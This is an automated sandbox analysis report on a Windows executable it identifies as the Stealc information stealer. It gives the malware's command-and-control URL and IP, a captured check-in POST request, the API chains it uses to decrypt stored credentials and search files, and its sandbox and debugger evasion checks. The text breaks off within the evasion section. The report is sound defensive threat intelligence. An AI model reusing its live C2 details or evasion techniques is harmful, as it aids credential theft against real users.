Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1540731
MD5:7cec6eefc34f3702d47fa5a28cbbb929
SHA1:dfe6aa0c35d17240cc857447d90614cec2d05b1a
SHA256:a6f91d78572a12eb6f938220ee73f01ee43ef6fdfaaedf8439c0be80553dd841
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1400 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7CEC6EEFC34F3702D47FA5A28CBBB929)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2163147892.00000000056E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2206022743.000000000195E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 1400JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 1400JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.de0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T04:01:20.917646+020020442431Malware Command and Control Activity Detected192.168.2.549723185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.de0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/rsonationVirustotal: Detection: 16%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00DEC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00DE9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00DE7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00DE9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00DF8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00DF38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DF4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00DEDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00DEE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00DF4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00DEED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DE16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEF68A FindFirstFileA,0_2_00DEF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DEF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00DF3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00DEBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DEDE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49723 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHCBAAEHCFIDGDHJEHCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 43 46 35 37 36 43 42 45 36 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------DGHCBAAEHCFIDGDHJEHCContent-Disposition: form-data; name="hwid"CCF576CBE6684217651120------DGHCBAAEHCFIDGDHJEHCContent-Disposition: form-data; name="build"doma------DGHCBAAEHCFIDGDHJEHC--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00DE4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHCBAAEHCFIDGDHJEHCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 43 46 35 37 36 43 42 45 36 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------DGHCBAAEHCFIDGDHJEHCContent-Disposition: form-data; name="hwid"CCF576CBE6684217651120------DGHCBAAEHCFIDGDHJEHCContent-Disposition: form-data; name="build"doma------DGHCBAAEHCFIDGDHJEHC--
                Source: file.exe, 00000000.00000002.2206022743.000000000195E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2206022743.00000000019B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2206022743.00000000019B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/KW
                Source: file.exe, 00000000.00000002.2206022743.00000000019A1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206022743.000000000195E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2206022743.00000000019D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4
                Source: file.exe, 00000000.00000002.2206022743.00000000019D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpE
                Source: file.exe, 00000000.00000002.2206022743.00000000019A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpIh
                Source: file.exe, 00000000.00000002.2206022743.00000000019D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpY
                Source: file.exe, 00000000.00000002.2206022743.00000000019B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpoW
                Source: file.exe, 00000000.00000002.2206022743.00000000019A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/rsonation

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C59040_2_011C5904
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B315F0_2_011B315F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E599E0_2_010E599E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011BB8410_2_011BB841
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C28F20_2_010C28F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011BD3B40_2_011BD3B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A43DD0_2_010A43DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B822D0_2_011B822D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AFAB60_2_011AFAB6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011BEDDE0_2_011BEDDE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D15D60_2_010D15D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C45C10_2_011C45C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C74020_2_011C7402
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01241F390_2_01241F39
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B16D80_2_011B16D8
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00DE45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: fzxkvimr ZLIB complexity 0.9951563407902382
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2163147892.00000000056E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00DF8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00DF3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\KE52B6CI.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1918464 > 1048576
                Source: file.exeStatic PE information: Raw size of fzxkvimr is bigger than: 0x100000 < 0x1ae400

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.de0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00DF9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1d5c72 should be: 0x1e322b
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: fzxkvimr
                Source: file.exeStatic PE information: section name: ubuokytu
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129A122 push ebx; mov dword ptr [esp], ecx0_2_0129A06E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push eax; mov dword ptr [esp], esi0_2_011C5908
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push 7A90DFE0h; mov dword ptr [esp], edx0_2_011C5928
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push 33C0B188h; mov dword ptr [esp], esi0_2_011C597C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push ecx; mov dword ptr [esp], ebp0_2_011C598B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push ecx; mov dword ptr [esp], 4B7EBF00h0_2_011C59A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push ebp; mov dword ptr [esp], ebx0_2_011C59E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push ecx; mov dword ptr [esp], esi0_2_011C5B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push eax; mov dword ptr [esp], 1D3F3CF6h0_2_011C5C11
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push edi; mov dword ptr [esp], esi0_2_011C5C7A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push edx; mov dword ptr [esp], ebp0_2_011C5C9B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push 056E4401h; mov dword ptr [esp], ecx0_2_011C5CE9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push edi; mov dword ptr [esp], eax0_2_011C5D44
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push edx; mov dword ptr [esp], ecx0_2_011C5D54
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push 0A8F6FE2h; mov dword ptr [esp], eax0_2_011C5D82
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push ebx; mov dword ptr [esp], 7BFAAC3Eh0_2_011C5D9C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push ebp; mov dword ptr [esp], esi0_2_011C5E5A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push edx; mov dword ptr [esp], ebp0_2_011C5F0C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push 3C57C4FBh; mov dword ptr [esp], esp0_2_011C5F39
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push 3BCBB000h; mov dword ptr [esp], edi0_2_011C5FE4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push ecx; mov dword ptr [esp], eax0_2_011C5FE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push 5D97B30Dh; mov dword ptr [esp], eax0_2_011C6022
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push eax; mov dword ptr [esp], ebp0_2_011C6064
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push eax; mov dword ptr [esp], ebx0_2_011C607D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push 2285F2EEh; mov dword ptr [esp], edx0_2_011C60E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push 329F207Dh; mov dword ptr [esp], edi0_2_011C6151
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push ecx; mov dword ptr [esp], edi0_2_011C618C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push 6DADD827h; mov dword ptr [esp], ebx0_2_011C61D5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push edi; mov dword ptr [esp], ebx0_2_011C61EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push edx; mov dword ptr [esp], ebx0_2_011C61F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C5904 push edi; mov dword ptr [esp], 04F9EAC6h0_2_011C6216
                Source: file.exeStatic PE information: section name: fzxkvimr entropy: 7.9537968539439525

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00DF9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13697
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10421CB second address: 1041A97 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F04D4C79EACh 0x00000008 jng 00007F04D4C79EA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jnp 00007F04D4C79EC0h 0x00000017 push ecx 0x00000018 jmp 00007F04D4C79EB8h 0x0000001d pop ecx 0x0000001e nop 0x0000001f pushad 0x00000020 pushad 0x00000021 mov ebx, dword ptr [ebp+122D3917h] 0x00000027 jmp 00007F04D4C79EB6h 0x0000002c popad 0x0000002d mov dword ptr [ebp+122D1AD7h], ecx 0x00000033 popad 0x00000034 push dword ptr [ebp+122D11D9h] 0x0000003a jmp 00007F04D4C79EB9h 0x0000003f call dword ptr [ebp+122D27AFh] 0x00000045 pushad 0x00000046 jo 00007F04D4C79EACh 0x0000004c mov dword ptr [ebp+122D17D9h], edx 0x00000052 xor eax, eax 0x00000054 mov dword ptr [ebp+122D17D9h], edi 0x0000005a mov edx, dword ptr [esp+28h] 0x0000005e cld 0x0000005f jmp 00007F04D4C79EB5h 0x00000064 mov dword ptr [ebp+122D385Bh], eax 0x0000006a stc 0x0000006b mov esi, 0000003Ch 0x00000070 pushad 0x00000071 mov ax, 116Bh 0x00000075 popad 0x00000076 add esi, dword ptr [esp+24h] 0x0000007a cld 0x0000007b lodsw 0x0000007d jmp 00007F04D4C79EAAh 0x00000082 add eax, dword ptr [esp+24h] 0x00000086 jnl 00007F04D4C79EACh 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 mov dword ptr [ebp+122D17D9h], ebx 0x00000096 nop 0x00000097 push eax 0x00000098 push edx 0x00000099 jmp 00007F04D4C79EB1h 0x0000009e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1041A97 second address: 1041AB9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F04D4C82A58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
